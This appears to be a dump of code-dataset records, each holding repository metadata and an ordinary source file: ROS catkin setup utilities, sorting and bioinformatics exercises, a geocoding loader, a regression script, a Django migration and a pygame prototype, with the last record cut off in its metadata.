blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
5
283
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
41
license_type
stringclasses
2 values
repo_name
stringlengths
7
96
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
58 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
12.7k
662M
star_events_count
int64
0
35.5k
fork_events_count
int64
0
20.6k
gha_license_id
stringclasses
11 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
43 values
src_encoding
stringclasses
9 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
7
5.88M
extension
stringclasses
30 values
content
stringlengths
7
5.88M
authors
sequencelengths
1
1
author
stringlengths
0
73
176d31a4c77d9a9650c5c3e08607b1e8d08aefbe
4f792275d800f90501615de3432768fbc0f88839
/catkin_ws/build/catkin_generated/stamps/Project/_setup_util.py.stamp
c61717a79d66a52a300918a90a7f61a3d092de17
[]
no_license
poolec4/rbe500_team2_pa3
dbc80646f2f6227523be5e7e1653b1a9e941aec4
22c5cde68416ab8d87497ad868cec29eb01d7299
refs/heads/master
2023-06-26T23:13:03.096721
2021-07-28T00:10:22
2021-07-28T00:10:22
380,965,222
0
0
null
null
null
null
UTF-8
Python
false
false
13,357
stamp
#!/usr/bin/python2 # -*- coding: utf-8 -*- # Software License Agreement (BSD License) # # Copyright (c) 2012, Willow Garage, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Willow Garage, Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """This file generates shell code for the setup.SHELL scripts to set environment variables.""" from __future__ import print_function import argparse import copy import errno import os import platform import sys CATKIN_MARKER_FILE = '.catkin' system = platform.system() IS_DARWIN = (system == 'Darwin') IS_WINDOWS = (system == 'Windows') PATH_TO_ADD_SUFFIX = ['bin'] if IS_WINDOWS: # while catkin recommends putting dll's into bin, 3rd party packages often put dll's into lib # since Windows finds dll's via the PATH variable, prepend it with path to lib PATH_TO_ADD_SUFFIX.extend([['lib', os.path.join('lib', 'x86_64-linux-gnu')]]) # subfolder of workspace prepended to CMAKE_PREFIX_PATH ENV_VAR_SUBFOLDERS = { 'CMAKE_PREFIX_PATH': '', 'LD_LIBRARY_PATH' if not IS_DARWIN else 'DYLD_LIBRARY_PATH': ['lib', os.path.join('lib', 'x86_64-linux-gnu')], 'PATH': PATH_TO_ADD_SUFFIX, 'PKG_CONFIG_PATH': [os.path.join('lib', 'pkgconfig'), os.path.join('lib', 'x86_64-linux-gnu', 'pkgconfig')], 'PYTHONPATH': 'lib/python2.7/dist-packages', } def rollback_env_variables(environ, env_var_subfolders): """ Generate shell code to reset environment variables. by unrolling modifications based on all workspaces in CMAKE_PREFIX_PATH. This does not cover modifications performed by environment hooks. """ lines = [] unmodified_environ = copy.copy(environ) for key in sorted(env_var_subfolders.keys()): subfolders = env_var_subfolders[key] if not isinstance(subfolders, list): subfolders = [subfolders] value = _rollback_env_variable(unmodified_environ, key, subfolders) if value is not None: environ[key] = value lines.append(assignment(key, value)) if lines: lines.insert(0, comment('reset environment variables by unrolling modifications based on all workspaces in CMAKE_PREFIX_PATH')) return lines def _rollback_env_variable(environ, name, subfolders): """ For each catkin workspace in CMAKE_PREFIX_PATH remove the first entry from env[NAME] matching workspace + subfolder. :param subfolders: list of str '' or subfoldername that may start with '/' :returns: the updated value of the environment variable. """ value = environ[name] if name in environ else '' env_paths = [path for path in value.split(os.pathsep) if path] value_modified = False for subfolder in subfolders: if subfolder: if subfolder.startswith(os.path.sep) or (os.path.altsep and subfolder.startswith(os.path.altsep)): subfolder = subfolder[1:] if subfolder.endswith(os.path.sep) or (os.path.altsep and subfolder.endswith(os.path.altsep)): subfolder = subfolder[:-1] for ws_path in _get_workspaces(environ, include_fuerte=True, include_non_existing=True): path_to_find = os.path.join(ws_path, subfolder) if subfolder else ws_path path_to_remove = None for env_path in env_paths: env_path_clean = env_path[:-1] if env_path and env_path[-1] in [os.path.sep, os.path.altsep] else env_path if env_path_clean == path_to_find: path_to_remove = env_path break if path_to_remove: env_paths.remove(path_to_remove) value_modified = True new_value = os.pathsep.join(env_paths) return new_value if value_modified else None def _get_workspaces(environ, include_fuerte=False, include_non_existing=False): """ Based on CMAKE_PREFIX_PATH return all catkin workspaces. :param include_fuerte: The flag if paths starting with '/opt/ros/fuerte' should be considered workspaces, ``bool`` """ # get all cmake prefix paths env_name = 'CMAKE_PREFIX_PATH' value = environ[env_name] if env_name in environ else '' paths = [path for path in value.split(os.pathsep) if path] # remove non-workspace paths workspaces = [path for path in paths if os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE)) or (include_fuerte and path.startswith('/opt/ros/fuerte')) or (include_non_existing and not os.path.exists(path))] return workspaces def prepend_env_variables(environ, env_var_subfolders, workspaces): """Generate shell code to prepend environment variables for the all workspaces.""" lines = [] lines.append(comment('prepend folders of workspaces to environment variables')) paths = [path for path in workspaces.split(os.pathsep) if path] prefix = _prefix_env_variable(environ, 'CMAKE_PREFIX_PATH', paths, '') lines.append(prepend(environ, 'CMAKE_PREFIX_PATH', prefix)) for key in sorted(key for key in env_var_subfolders.keys() if key != 'CMAKE_PREFIX_PATH'): subfolder = env_var_subfolders[key] prefix = _prefix_env_variable(environ, key, paths, subfolder) lines.append(prepend(environ, key, prefix)) return lines def _prefix_env_variable(environ, name, paths, subfolders): """ Return the prefix to prepend to the environment variable NAME. Adding any path in NEW_PATHS_STR without creating duplicate or empty items. """ value = environ[name] if name in environ else '' environ_paths = [path for path in value.split(os.pathsep) if path] checked_paths = [] for path in paths: if not isinstance(subfolders, list): subfolders = [subfolders] for subfolder in subfolders: path_tmp = path if subfolder: path_tmp = os.path.join(path_tmp, subfolder) # skip nonexistent paths if not os.path.exists(path_tmp): continue # exclude any path already in env and any path we already added if path_tmp not in environ_paths and path_tmp not in checked_paths: checked_paths.append(path_tmp) prefix_str = os.pathsep.join(checked_paths) if prefix_str != '' and environ_paths: prefix_str += os.pathsep return prefix_str def assignment(key, value): if not IS_WINDOWS: return 'export %s="%s"' % (key, value) else: return 'set %s=%s' % (key, value) def comment(msg): if not IS_WINDOWS: return '# %s' % msg else: return 'REM %s' % msg def prepend(environ, key, prefix): if key not in environ or not environ[key]: return assignment(key, prefix) if not IS_WINDOWS: return 'export %s="%s$%s"' % (key, prefix, key) else: return 'set %s=%s%%%s%%' % (key, prefix, key) def find_env_hooks(environ, cmake_prefix_path): """Generate shell code with found environment hooks for the all workspaces.""" lines = [] lines.append(comment('found environment hooks in workspaces')) generic_env_hooks = [] generic_env_hooks_workspace = [] specific_env_hooks = [] specific_env_hooks_workspace = [] generic_env_hooks_by_filename = {} specific_env_hooks_by_filename = {} generic_env_hook_ext = 'bat' if IS_WINDOWS else 'sh' specific_env_hook_ext = environ['CATKIN_SHELL'] if not IS_WINDOWS and 'CATKIN_SHELL' in environ and environ['CATKIN_SHELL'] else None # remove non-workspace paths workspaces = [path for path in cmake_prefix_path.split(os.pathsep) if path and os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE))] for workspace in reversed(workspaces): env_hook_dir = os.path.join(workspace, 'etc', 'catkin', 'profile.d') if os.path.isdir(env_hook_dir): for filename in sorted(os.listdir(env_hook_dir)): if filename.endswith('.%s' % generic_env_hook_ext): # remove previous env hook with same name if present if filename in generic_env_hooks_by_filename: i = generic_env_hooks.index(generic_env_hooks_by_filename[filename]) generic_env_hooks.pop(i) generic_env_hooks_workspace.pop(i) # append env hook generic_env_hooks.append(os.path.join(env_hook_dir, filename)) generic_env_hooks_workspace.append(workspace) generic_env_hooks_by_filename[filename] = generic_env_hooks[-1] elif specific_env_hook_ext is not None and filename.endswith('.%s' % specific_env_hook_ext): # remove previous env hook with same name if present if filename in specific_env_hooks_by_filename: i = specific_env_hooks.index(specific_env_hooks_by_filename[filename]) specific_env_hooks.pop(i) specific_env_hooks_workspace.pop(i) # append env hook specific_env_hooks.append(os.path.join(env_hook_dir, filename)) specific_env_hooks_workspace.append(workspace) specific_env_hooks_by_filename[filename] = specific_env_hooks[-1] env_hooks = generic_env_hooks + specific_env_hooks env_hooks_workspace = generic_env_hooks_workspace + specific_env_hooks_workspace count = len(env_hooks) lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_COUNT', count)) for i in range(count): lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d' % i, env_hooks[i])) lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d_WORKSPACE' % i, env_hooks_workspace[i])) return lines def _parse_arguments(args=None): parser = argparse.ArgumentParser(description='Generates code blocks for the setup.SHELL script.') parser.add_argument('--extend', action='store_true', help='Skip unsetting previous environment variables to extend context') parser.add_argument('--local', action='store_true', help='Only consider this prefix path and ignore other prefix path in the environment') return parser.parse_known_args(args=args)[0] if __name__ == '__main__': try: try: args = _parse_arguments() except Exception as e: print(e, file=sys.stderr) sys.exit(1) if not args.local: # environment at generation time CMAKE_PREFIX_PATH = r'/home/chris/rbe500_team2_pa3/catkin_ws/devel;/opt/ros/melodic'.split(';') else: # don't consider any other prefix path than this one CMAKE_PREFIX_PATH = [] # prepend current workspace if not already part of CPP base_path = os.path.dirname(__file__) # CMAKE_PREFIX_PATH uses forward slash on all platforms, but __file__ is platform dependent # base_path on Windows contains backward slashes, need to be converted to forward slashes before comparison if os.path.sep != '/': base_path = base_path.replace(os.path.sep, '/') if base_path not in CMAKE_PREFIX_PATH: CMAKE_PREFIX_PATH.insert(0, base_path) CMAKE_PREFIX_PATH = os.pathsep.join(CMAKE_PREFIX_PATH) environ = dict(os.environ) lines = [] if not args.extend: lines += rollback_env_variables(environ, ENV_VAR_SUBFOLDERS) lines += prepend_env_variables(environ, ENV_VAR_SUBFOLDERS, CMAKE_PREFIX_PATH) lines += find_env_hooks(environ, CMAKE_PREFIX_PATH) print('\n'.join(lines)) # need to explicitly flush the output sys.stdout.flush() except IOError as e: # and catch potential "broken pipe" if stdout is not writable # which can happen when piping the output to a file but the disk is full if e.errno == errno.EPIPE: print(e, file=sys.stderr) sys.exit(2) raise sys.exit(0)
73829092e2f3d7817b1fb45bfadc46dc178673f0
b3943565e361393488764718d72c1e480ad1afdd
/algorithms/Problem_Solving_Algorithms_Data Structures/sorting_and_search/bubble_sort.py
ec2b110441127d45296bb6055f4ae7d9277f6679
[]
no_license
DerevenetsArtyom/pure-python
1f48f83c7475dfbbc28b71c97b81126246d8ffc8
186b9ed52962158d8c9f2c4dddeff5a7e7c5369c
refs/heads/master
2021-04-09T13:47:55.743862
2018-04-01T17:05:49
2018-04-01T17:05:49
125,518,923
1
0
null
null
null
null
UTF-8
Python
false
false
2,334
py
def bubble_sort(arr): """ Вне зависимости от первоначального порядка элементов, для списка из n элементов будет сделан n−1 проход """ # reduce number of elements in every next iteration with shifting # right bound, but that doesn't reduce complexity ((( for right_bound in range(len(arr) - 1, 0, -1): for i in range(right_bound): if arr[i] > arr[i + 1]: arr[i], arr[i + 1] = arr[i + 1], arr[i] lst = [11, 1, 3, 4, 2, 66, 8] bubble_sort(lst) assert lst == [1, 2, 3, 4, 8, 11, 66] """ Однако, поскольку пузырьковая сортировка делает проход по всей несортированной части списка, она умеет то, что не могут большинство сортировочных алгоритмов. В частности, если во время прохода не было сделано ни одной перестановки, то мы знаем, что список уже отсортирован. Таким образом, алгоритм может быть модифицирован, чтобы останавливаться раньше, если обнаруживает, что задача выполнена. Т.е. для списков, которым нужно всего несколько проходов, пузырьковая сортировка имеет преимущество, поскольку умеет распознать сортированный список и остановиться. Эту модификацию, которую часто называют коротким пузырьком. """ def short_bubble_sort(arr): exchanges = True # keep track of made exchanges right_bound = len(arr) - 1 while right_bound > 0 and exchanges: exchanges = False # hope that elements will not exchange for i in range(right_bound): if arr[i] > arr[i + 1]: exchanges = True arr[i], arr[i + 1] = arr[i + 1], arr[i] right_bound -= 1 alist = [20, 30, 40, 90, 50, 60, 70, 80, 100, 110] short_bubble_sort(alist) assert alist == [20, 30, 40, 50, 60, 70, 80, 90, 100, 110]
992b3eeeeb12af1c4f87a8ebc9d1a998c7f36590
3d4cdbca777ad6c2b86ab0e463090484a184455a
/geoload1.py
546bb52de2b0fcd9bb5dcfd841ed1cf3cf70971f
[]
no_license
samironta/pythonplay
388900b9c31a99afcee23fd4e16ff5b78e75fd88
4e29c7e18daf149ed0da219a3cb3f4d673a1e0c5
refs/heads/main
2023-04-22T21:00:03.609072
2021-05-12T10:28:40
2021-05-12T10:28:40
366,677,753
0
0
null
null
null
null
UTF-8
Python
false
false
2,201
py
import urllib.request, urllib.parse, urllib.error import http import sqlite3 import json import time import ssl import sys api_key = False # If you have a Google Places API key, enter it here # api_key = 'AIzaSy___IDByT70' if api_key is False: api_key = 42 serviceurl = "http://py4e-data.dr-chuck.net/json?" else : serviceurl = "https://maps.googleapis.com/maps/api/geocode/json?" # Additional detail for urllib # http.client.HTTPConnection.debuglevel = 1 conn = sqlite3.connect('geodata.sqlite') cur = conn.cursor() cur.execute(''' CREATE TABLE IF NOT EXISTS Locations (address TEXT, geodata TEXT)''') # Ignore SSL certificate errors ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE fh = open("where1.data") count = 0 for line in fh: if count > 200 : print('Retrieved 200 locations, restart to retrieve more') break address = line.strip() print('') cur.execute("SELECT geodata FROM Locations WHERE address= ?", (memoryview(address.encode()), )) try: data = cur.fetchone()[0] print("Found in database ",address) continue except: pass parms = dict() parms["address"] = address if api_key is not False: parms['key'] = api_key url = serviceurl + urllib.parse.urlencode(parms) print('Retrieving', url) uh = urllib.request.urlopen(url, context=ctx) data = uh.read().decode() print('Retrieved', len(data), 'characters', data[:20].replace('\n', ' ')) count = count + 1 try: js = json.loads(data) except: print(data) # We print in case unicode causes an error continue if 'status' not in js or (js['status'] != 'OK' and js['status'] != 'ZERO_RESULTS') : print('==== Failure To Retrieve ====') print(data) break cur.execute('''INSERT INTO Locations (address, geodata) VALUES ( ?, ? )''', (memoryview(address.encode()), memoryview(data.encode()) ) ) conn.commit() if count % 10 == 0 : print('Pausing for a bit...') time.sleep(5) print("Run geodump.py to read the data from the database so you can vizualize it on a map.")
72274c90e2fd879e0b7587929824304189aaf536
a89c67e57352448941f14e4441ca09bc75d819f9
/Support Vector Regression (SVR)/suvecreg.py
5af8e4c98759e01ee85403d3af0b4b763b52af99
[]
no_license
SaiSiddhanthGujjari/Regression-Models
1345e1f86440f34a137594fe340b1ab73357831c
5f043dfadd42f8c08b8c213a73cb9e3f1fdf84ae
refs/heads/master
2020-12-18T09:43:29.349213
2020-01-21T12:31:32
2020-01-21T12:41:47
235,333,211
0
0
null
null
null
null
UTF-8
Python
false
false
1,143
py
# -*- coding: utf-8 -*- """ Created on Wed Apr 18 22:08:42 2018 @author: Sai Siddhanth """ #Importing the libraries import numpy as np import matplotlib.pyplot as plt import pandas as pd #Importing the dataset dataset = pd.read_csv('Position_Salaries.csv') #Creating matrix of features and an dependent vector X = dataset.iloc[:, 1:2].values y = dataset.iloc[:,2].values #Splitting the dataset into training set and test set """from sklearn.cross_validation import train_test_split train_X,test_X,train_y,test_y = train_test_split(X,y , test_size = 0.2, random_state = 0)""" #Feature Scaling from sklearn.preprocessing import StandardScaler sc_X = StandardScaler() sc_y = StandardScaler() X = sc_X.fit_transform(X) y = sc_y.fit_transform(y) #Fitting SVR to the dataset from sklearn.svm import SVR regressor = SVR(kernel = 'rbf') regressor.fit(X,y) #Predicting a new result with polynomial regression regressor.predict(6.5) #Visualzing the SVR results plt.scatter(X, y, color = 'red') plt.plot(X, regressor.predict((X)), color = 'blue') plt.title('Level vs Salary (Regression)') plt.xlabel('Level') plt.ylabel('Salary') plt.show()
0b34c179615c5c47fadc78c555343f10233332c6
0baa5beb0ca5044b006b3b1aa67fd5042334720d
/webserver/serverapp/migrations/0006_auto_20170319_2206.py
e0c0fbf8d4cac3480bded23d47ab9ef86a7206a9
[]
no_license
meddeb9989/tntwebserver
20791d29ba45705234ae3679e139ca6126e0233b
6526a36994288b53290d0149c2c97e9d67b8b3cb
refs/heads/master
2021-01-20T10:21:27.527155
2017-12-04T16:05:06
2017-12-04T16:05:06
83,928,109
0
0
null
null
null
null
UTF-8
Python
false
false
467
py
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-03-19 22:06 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('serverapp', '0005_transaction_confirmed'), ] operations = [ migrations.AlterField( model_name='transaction', name='confirmed', field=models.BooleanField(default=False), ), ]
1f126186de13c9e59d1d5342af2047ea667277f9
009594f6a84c9fc66e4be6a60d59c8d2c7c5aed8
/PythonThings/ElseWithLoops.py
136a35c6bb3baf7713c2f7cb688a4743307d61ef
[]
no_license
cyperh17/python
c8c04877a6007656d3a19b471c17a9720e68cc91
2279c630e02cf6a4eaef2a8f65a665ce246bd8a2
refs/heads/master
2021-01-24T09:31:17.241324
2016-09-28T15:28:44
2016-09-28T15:28:44
68,818,718
0
0
null
null
null
null
UTF-8
Python
false
false
859
py
l = range(0, 10) #for for i in l: print(i, end=' ') if(i == 3): break #causes loop to break so then else not get called else: #also called 'no break'. Else is called when break didnt called in the loop print('\nHit the for/else statetement!') print('\n') #while i = 0 while i < (len(l) - 1): print(i, end=' ') i += 1 if(i == 3): break #causes loop to break so then else not get called else: #also called 'no break'. Else is called when break didnt called in the loop print('\nHit the for/else statetement!') print('\n') #example def find_index(to_search, target): for i, value in enumerate(to_search): if(value == target): break else: return -1 return i l = ['a', 'b', 'c', 'd'] ind_one = find_index(l, 'd') ind_two = find_index(l, 'ddd') print(ind_one) print(ind_two)
96bd79305b964700660216a7aff3846297cd700f
055e3b34d8f288d354c6a09e75f14bc1584bf2eb
/text (laba 4,5,6)/laba5.py
669de58713ebe210092b14aa0153fe18127b2469
[]
no_license
jmaynard-n/oavi
c55f2e897305bf41e1222d4e725cf9055bfa35ec
042b2eb31f3fac964fb0017a036ee3389a71a815
refs/heads/master
2021-01-04T18:04:45.371911
2020-04-19T23:47:31
2020-04-19T23:47:31
240,701,100
0
0
null
null
null
null
UTF-8
Python
false
false
2,275
py
import csv from bin import Thresholding_Otsu as otsu from semi import semitone from PIL import Image import numpy as np from profile import profiles, prof_axis from croping import crop from segmentation import segment from generator import str_gen import os import shutil def imprt(file): img = Image.open(file, 'r') img = img.convert("RGB") img = otsu(semitone(img)) return img def set_dirs(i): if os.path.exists("./phrases/" + i): shutil.rmtree("./phrases/" + i) os.mkdir("./phrases/" + i) if os.path.exists("./phrases/" + i + "/smbls"): shutil.rmtree("./phrases/" + i + "/smbls") os.mkdir("./phrases/" + i + "/smbls") if os.path.exists("./phrases/" + i + "/prof_x"): shutil.rmtree("./phrases/" + i + "/prof_x") os.mkdir("./phrases/" + i + "/prof_x") if os.path.exists("./phrases/" + i + "/prof_y"): shutil.rmtree("./phrases/" + i + "/prof_y") os.mkdir("./phrases/" + i + "/prof_y") phrases = ["HEY WHERE DO YOU GET IT FROM","ABCDEFGHIJKLMNOPQRSTUVWXYZ", "ALEJANDRO WAS FILLED WITH THE TRANSCENDENCE OF WHAT WAS HAPPENING AND KNEW THE MEANING OF LIFE","BUT VIXEN IS PIQUED", "WHAT GOES UP MUST GO DOWN", "GRAPE JELLY WAS TASTY", "LOVE IS NOT LIKE PIZZA"] # with open('features.csv') as f: # reader = csv.reader(f, delimiter=';') # gold = list(reader) # gold.pop(0) # alf = {key: val for key, val in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ")} for i in range(1, 2): str_gen(phrases[i - 1], str(i)) new = imprt("phrase" + str(i) + ".png") set_dirs(str(i)) new.save("./phrases/" + str(i) + "/" + "phrase" +".bmp") map = np.asarray(new, dtype=np.uint8) px = map.reshape((new.height, new.width)) prof_axis(px, str(i * 1000), 0, "./phrases/" + str(i) + "/prof") prof_axis(px, str(i * 1000), 1, "./phrases/" + str(i) + "/prof") px = crop(px, [0]) # profiles(None, px, i * 1000, "./phrases/" + str(i) + "/prof") pr_x = prof_axis(px, str(i), 0, None) coords = segment(pr_x) print(coords) k = 1; for c in coords: new = Image.fromarray(px[:, c[2] : c[3]], "L") new.save("./phrases/" + str(i) + "/smbls/" + str(k) + ".png") profiles(None, px[:, c[2] : c[3]], k, "./phrases/" + str(i) + "/prof") k+=1
5f967271f6f88bdf986b54e47f62f5bcfbb94893
e8421a737d596d757e617087ae549505cacafa52
/tests/api_utils.py
13956f212fcc22af4b0060daad3f17be59a3667d
[]
no_license
webclinic017/valkyrie-2
e6e533aedb39bbf98833e0ebea55446e1088f795
76e7c1ba31387fdf1982e2ad0ff579c8c41f061e
refs/heads/master
2023-04-03T03:14:59.941236
2021-04-18T16:38:51
2021-04-18T16:38:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,042
py
import os from datetime import datetime from typing import List from uuid import uuid4 from backtrader import TimeFrame from valkyrie.api import api from valkyrie.configs import BrokerConfig, MarketConfig def use_api( graph: List[dict], task_id: str = str(uuid4()), broker_config: BrokerConfig = BrokerConfig(cash=100_000_000), market_config: MarketConfig = MarketConfig( from_date=datetime(year=2014, month=1, day=1), to_date=datetime(year=2014, month=1, day=4), timeframe=TimeFrame.Minutes, symbols=["A", "F"], ), env: dict = {"unittest": True}, ): return api( graph=graph, task_id=task_id, broker_config=broker_config, market_config=market_config, env=env, ) def use_market_node(id: str): return { "node_str": "market", "module_str": "market", "id": id, "type": "MARKET_NODE", "parameters": {}, "inputs": {}, "outputs": ["open", "high", "low", "close", "volume"], }
86e3c088412f6fbe1a0e19035adc5ccd92678946
8bb4a472344fda15985ac322d14e8f4ad79c7553
/Python3-Core/src/main/prompto/expression/IteratorExpression.py
b971b1ee518405148002356368f86332f182ab37
[]
no_license
prompto/prompto-python3
c6b356f5af30c6826730ba7f2ad869f341983a2d
64bd3d97d4702cc912097d41d961f7ab3fd82bee
refs/heads/master
2022-12-24T12:33:16.251468
2022-11-27T17:37:56
2022-11-27T17:37:56
32,623,633
4
0
null
2019-05-04T11:06:05
2015-03-21T07:17:25
Python
UTF-8
Python
false
false
3,006
py
from prompto.expression.IExpression import IExpression from prompto.expression.ParenthesisExpression import ParenthesisExpression from prompto.runtime.Variable import Variable from prompto.error.InternalError import InternalError from prompto.statement.UnresolvedCall import UnresolvedCall from prompto.type.IteratorType import IteratorType from prompto.value.IterableValue import IterableValue class IteratorExpression(IExpression): def __init__(self, name, source, exp): self.name = name self.source = source self.expression = exp def check(self, context): elemType = self.source.check(context).checkIterator(context) child = context.newChildContext() context.registerValue(Variable(self.name, elemType)) itemType = self.expression.check(child) return IteratorType(itemType) def interpret(self, context): elemType = self.source.check(context).checkIterator(context) items = self.source.interpret(context) length = items.getMemberValue(context, "count", False) iterator = self.getIterator(context, items) return IterableValue(context, self.name, elemType, iterator, length, self.expression) def getIterator(self, context, src): if getattr(src, "getIterator", None) is None: raise InternalError("Should never get there!") else: return src.getIterator(context) def toMDialect(self, writer): expression = IteratorExpression.extractFromParenthesisIfPossible(self.expression) expression.toDialect(writer) writer.append(" for each ") writer.append(self.name) writer.append(" in ") self.source.toDialect(writer) def toODialect(self, writer): expression = IteratorExpression.extractFromParenthesisIfPossible(self.expression) expression.toDialect(writer) writer.append(" for each ( ") writer.append(self.name) writer.append(" in ") self.source.toDialect(writer) writer.append(" )") def toEDialect(self, writer): expression = IteratorExpression.encloseInParenthesisIfRequired(self.expression) expression.toDialect(writer) writer.append(" for each ") writer.append(self.name) writer.append(" in ") self.source.toDialect(writer) @staticmethod def encloseInParenthesisIfRequired(expression): if IteratorExpression.mustBeEnclosedInParenthesis(expression): return ParenthesisExpression(expression) else: return expression @staticmethod def mustBeEnclosedInParenthesis(expression): return isinstance(expression, UnresolvedCall) @staticmethod def extractFromParenthesisIfPossible(expression): if isinstance(expression, ParenthesisExpression): if IteratorExpression.mustBeEnclosedInParenthesis(expression.expression): return expression.expression return expression
091522fb133d1992f60b8ce09069a41aacd45df5
98fd03020731a52b2880c49494514ede718eeaf4
/week1/DeBrujinGraph.py
0de0c341ccf7cb986aef5a05861bce58b56b2a01
[]
no_license
JoaoHenriqueOliveira/Bioinformatics-2
6e77eff53d49bcbda4686c92a852f34b5dbe45fe
18ab53201a3e2057b60ff0fcfaf76242ae96d27e
refs/heads/master
2022-12-16T04:40:51.129763
2020-10-01T15:05:26
2020-10-01T15:05:26
272,672,379
0
0
null
null
null
null
UTF-8
Python
false
false
826
py
import unittest def DeBrujinGraph(k, text): k, n, dic = k - 1, len(text), {} res = [text[i:i + k] for i in range(n - k + 1)] res.sort() for elem in res: dic[elem] = [] for j in range(n - k): dic[text[j:j + k]].append(text[j + 1: j + k + 1]) for key in dic: dic[key].sort() return dic def DeBrujin(patterns): k = len(patterns[0]) graph = {} for k_mer in patterns: graph[k_mer[0:(k - 1)]] = [] graph[k_mer[1:k]] = [] for node in graph: for k_mer in patterns: if k_mer[0: (k - 1)] == node: graph[node].append(k_mer[1:k]) return graph if __name__ == "__main__": print(DeBrujin(["CTTA","ACCA","TACC","GGCT","GCTT","TTAC"])) pass
2b03f14f9c80f1dfdc0bae01a6cc959c1db39ca5
d84933816d3c9b05003198ccc6c8bcdd876a0690
/pie_examples/old/game_proto1.py
5a58cf76d960bc75aac7f2e395c0625d9ef2ef4d
[]
no_license
adoc/pieEngine
ae6cc8828c1217a226735fec3c995e06cf7b7baa
f799555ff5a6d86232e9b15408916b60079cd19f
refs/heads/master
2020-05-20T18:49:13.449808
2015-05-11T08:39:05
2015-05-11T08:39:05
34,555,334
0
0
null
null
null
null
UTF-8
Python
false
false
2,919
py
# TODO: Broken! import time import pygame from pygame.locals import * from lanchester.model.side import Battalion from pie_examples.ameiosis.sprite import Army from pie_examples.ameiosis.game import Ameiosis as AmeosisBase class Ameosis(AmeosisBase): def __init__(self,*args, **kwa): super(Ameosis, self).__init__(*args, **kwa) self.__spawn_size = 1 self.__spawn_team = 0 self.events.bind(K_UP, self.__ev_inc_spawn_size) self.events.bind(K_DOWN, self.__ev_dec_spawn_size) self.events.bind(K_LEFT, self.__ev_dec_team) self.events.bind(K_RIGHT, self.__ev_inc_team) self.events.bind(K_SPACE, self.__ev_tog_simulate) self.events.bind(MOUSEBUTTONDOWN, self.__ev_mouse_down) def __ev_inc_spawn_size(self, ev): self.spawn_size += 1 def __ev_dec_spawn_size(self, ev): self.spawn_size -= 1 def __ev_inc_team(self, ev): self.spawn_team += 1 def __ev_dec_team(self, ev): self.spawn_team -= 1 def __ev_tog_simulate(self, ev): self._simulate_battle = not self._simulate_battle @property def spawn_size(self): return self.__spawn_size @spawn_size.setter def spawn_size(self, val): if val > 10: self.__spawn_size = 10 elif val < 1: self.__spawn_size = 1 else: self.__spawn_size = val @property def spawn_team(self): return self.__spawn_team @spawn_team.setter def spawn_team(self, val): if val > 1: self.__spawn_team = 1 elif val < 0: self.__spawn_team = 0 else: self.__spawn_team = val def __ev_mouse_down(self, ev): if ev.button == 3: # Right-Click army = Army(self.__spawn_size, self.__spawn_team, ev.pos) army.battalion = Battalion(self.__spawn_size * 1000, .01) self._armies_lanc_factions[self.__spawn_team].add_member( army.battalion) self._armies_sprites[self.__spawn_team].add(army) self.__drag_handler.add(army) def update(self): super(Ameosis, self).update() self._debug_lines.append(("Size (up/down): %s" % (self.__spawn_size), 1, (240, 240, 240))) self._debug_lines.append(("Team (left/right): %s" % (self.__spawn_team), 1, (240, 240, 240))) self._debug_lines.append(("Simulate (space): %s" % (self._simulate_battle), 1, (240, 240, 240))) if __name__ == "__main__": pygame.init() clock = pygame.time.Clock() screen = pygame.display.set_mode((1024, 512)) game = Ameosis(screen, clock) while not game.stopped: t1 = time.time() game.buffer() game.update() game.draw() game.render() # Will be refactored. game.draw_debug(tick_time=time.time() - t1)
c45b2fb0ebebf62d046dfced155b98f95eed5dc9
dc1b7ffbb86b12213ee37cbd64b27865055fe52f
/django/composeexample/settings.py
fbfdfd13a31470332f09a46529c8b04a35f51b37
[ "MIT" ]
permissive
rsskga/lambdata-rsskga
cac3dbbd594d3a1057748abebac458c3eb33f5b3
fe8898fd2574cad66c6e317221ea33e4d5b9e8f7
refs/heads/master
2022-12-11T09:56:07.876931
2019-10-30T23:00:57
2019-10-30T23:00:57
218,158,540
0
0
MIT
2022-12-08T06:48:49
2019-10-28T22:41:10
Python
UTF-8
